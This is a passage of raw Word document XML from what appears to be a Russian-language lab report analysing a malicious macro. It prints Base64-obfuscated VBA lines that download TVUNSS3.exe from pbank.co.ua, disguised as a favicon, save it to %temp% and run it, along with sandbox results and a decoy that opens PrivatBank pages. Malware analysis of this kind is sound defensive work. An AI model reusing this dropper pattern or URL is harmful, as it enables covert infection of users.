        </w:rPr>
        <w:t>Sub Test()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, которая, в свою очередь, вызывает </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Function HashCheck()</w:t>
      </w:r>
      <w:r w:rsidR="002D5007" w:rsidRPr="002D5007">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:t>см. рисунок 4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13783CD0" w14:textId="77777777" w:rsidR="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:keepNext/>
        <w:ind w:left="1211" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0E4B52" wp14:editId="1F807D7E">
            <wp:extent cx="4458971" cy="29276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9331" cy="29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2AAE" w14:textId="2A54043A" w:rsidR="008E70B1" w:rsidRPr="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002D5007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2D5007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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Функции </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HashCheck</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">() и </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495AD21C" w14:textId="2CE5C533" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="002D5007">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Скачивание полезной нагрузки</w:t>
      </w:r>
      <w:r w:rsidR="002D5007" w:rsidRPr="002D5007">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:t xml:space="preserve">в функции </w:t>
      </w:r>
      <w:r w:rsidR="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HashCheck</w:t>
      </w:r>
      <w:r w:rsidR="002D5007" w:rsidRPr="002D5007">
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C51FF" w14:textId="0AF7CC3A" w:rsidR="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateObject</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NjcmlwdC</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zaGVsbA</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=="))</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wscript</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>she</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DFE38" w14:textId="6E25AB06" w:rsidR="008E70B1" w:rsidRPr="002D5007" w:rsidRDefault="002D5007" w:rsidP="002D5007">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et h = CreateObject(B64Dec("bXN4bWwyLnhmbGh0dHA="))</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msxml2.xmlhttp (</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>обфусцировано</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="002D5007">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base64). </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>Это</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t>запросов</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1" w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428E96C4" w14:textId="77777777" w:rsidR="008E70B1" w:rsidRPr="001A29E5" w:rsidRDefault="008E70B1" w:rsidP="008E70B1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9B7D88" w14:textId="24D578D3" w:rsidR="008E70B1" w:rsidRPr="001A29E5" w:rsidRDefault="008E70B1" w:rsidP="00B959DE">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p = s.ExpandEnvironmentStrings("%temp%") &amp; B64Dec("XFRWVU5TUzMuZXhl")</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE" w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Формируется</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>путь</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сохранения</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: C:\Users\&lt;USER&gt;\AppData\Local\Temp\TVUNSS3.exe. </w:t>
      </w:r>
      <w:r>
        <w:t>Это</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>есть</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>основная</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вредоносная</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>нагрузка</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425FD586" w14:textId="633AB5DE" w:rsidR="008E70B1" w:rsidRPr="007A4852" w:rsidRDefault="008E70B1" w:rsidP="00B959DE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>h.Open "get", B64Dec("aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv"), False</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL для скачивания: http://p</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE">
        <w:t>bank.co.ua/favicon.ico. Вредоносный макрос</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve">отправляет </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="007A4852" w:rsidRPr="007A4852">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve">запрос и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">маскирует скачивание под </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve">безобидную иконку (т.е. для антивируса скачивание будет выглядеть как </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="007A4852" w:rsidRPr="007A4852">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve">запрос к безобидному адресу, но при анализе макросов видно, что реализуются и другие вредные </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="007A4852" w:rsidRPr="007A4852">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve"> – запросы, или же </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>favicon</w:t>
      </w:r>
      <w:r w:rsidR="007A4852" w:rsidRPr="007A4852">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ico</w:t>
      </w:r>
      <w:r w:rsidR="007A4852" w:rsidRPr="007A4852">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A4852">
        <w:t xml:space="preserve">уже заменен на вредоносный исполняемый файл). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A82A74" w14:textId="7C6BC021" w:rsidR="008E70B1" w:rsidRPr="00B959DE" w:rsidRDefault="00B959DE" w:rsidP="00B959DE">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>With CreateObject(B64Dec("YWRvZGIuc3RyZWFt"))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>- ф</w:t>
      </w:r>
      <w:r w:rsidR="008E70B1">
        <w:t xml:space="preserve">айл скачивается и сохраняется с помощью adodb.stream </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve">(обфусцировано из </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dec</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(“YWRvZGIuc3RyZWFt”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>под именем TVUNSS3.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24655E95" w14:textId="012DB342" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="00B959DE">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Запуск нагрузки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39317EF6" w14:textId="193CCA4A" w:rsidR="008E70B1" w:rsidRDefault="008E70B1" w:rsidP="00B959DE">
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>s.Run p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Запускается скачанн</w:t>
      </w:r>
      <w:r w:rsidR="00B959DE">
        <w:t>ый TVUNSS3.exe из папки %temp%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2DD9EE" w14:textId="3D374E7E" w:rsidR="00B959DE" w:rsidRDefault="00B959DE" w:rsidP="00B959DE">
      <w:r>
        <w:t xml:space="preserve">По выводу сетевых запросов из онлайн-песочницы </w:t>
      </w:r>
      <w:r w:rsidR="00DE7BBB">
        <w:t>подтверждаются</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запросы к </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve">http://pbank.co.ua/favicon.ico и </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="006F7D8C">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>http://pbank.co.ua/img/rKPGshUCwICOdqe1P8Ig5odmykCedtG2zar.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (для иконки). И действия с файлами</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и процессами</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567E8B9" w14:textId="54C20154" w:rsidR="00B959DE" w:rsidRPr="001A29E5" w:rsidRDefault="00B959DE" w:rsidP="00B959DE">
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>written</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>\&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>&gt;\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Temp</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TVUNSS</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>был</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>успешно</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>создан</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t>диске</w:t>
      </w:r>
      <w:r w:rsidRPr="001A29E5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC89E08" w14:textId="22B3CB8E" w:rsidR="00B959DE" w:rsidRPr="00B959DE" w:rsidRDefault="00B959DE" w:rsidP="00B959DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Processes created: "C:\Users\&lt;USER&gt;\AppData\Local\Temp\TVUNSS3.e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xe" — файл был успешно запущен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94F1F0" w14:textId="0EEB3C36" w:rsidR="008E70B1" w:rsidRDefault="00B959DE" w:rsidP="00B959DE">
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve">Также видно, что макрос открывал браузер </w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959DE">
        <w:t xml:space="preserve"> с легитимными сайтами ПриватБанка — это часть маскировки, чтобы пользователь не заподозрил неладное.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171A22E" w14:textId="4086AF61" w:rsidR="007A4852" w:rsidRDefault="007A4852" w:rsidP="00B959DE">
      <w:r>
        <w:t xml:space="preserve">Теперь когда стало понятно, что непосредственно вредоносный файл – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TVUNSS</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4852">
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005F78C9">
        <w:t xml:space="preserve">необходимо было бы проанализировать его. Но указанный файл </w:t>
      </w:r>
      <w:r w:rsidR="005F78C9">
        <w:lastRenderedPageBreak/>
        <w:t>не удалось получить из онлайн-песочницы, а запускать его для извлечения даже на виртуальной машине крайне опасно, поэтому не будем этого делать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0301FF" w14:textId="4C48E8E2" w:rsidR="007C395F" w:rsidRPr="007C395F" w:rsidRDefault="007C395F" w:rsidP="00B959DE">
      <w:r>
        <w:t xml:space="preserve">К сожалению, рассмотреть на практике запуск документа не получилось, так как не вышло установить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="007C395F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r w:rsidRPr="007C395F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на виртуальную машину.</w:t>
      </w:r>
    </w:p>
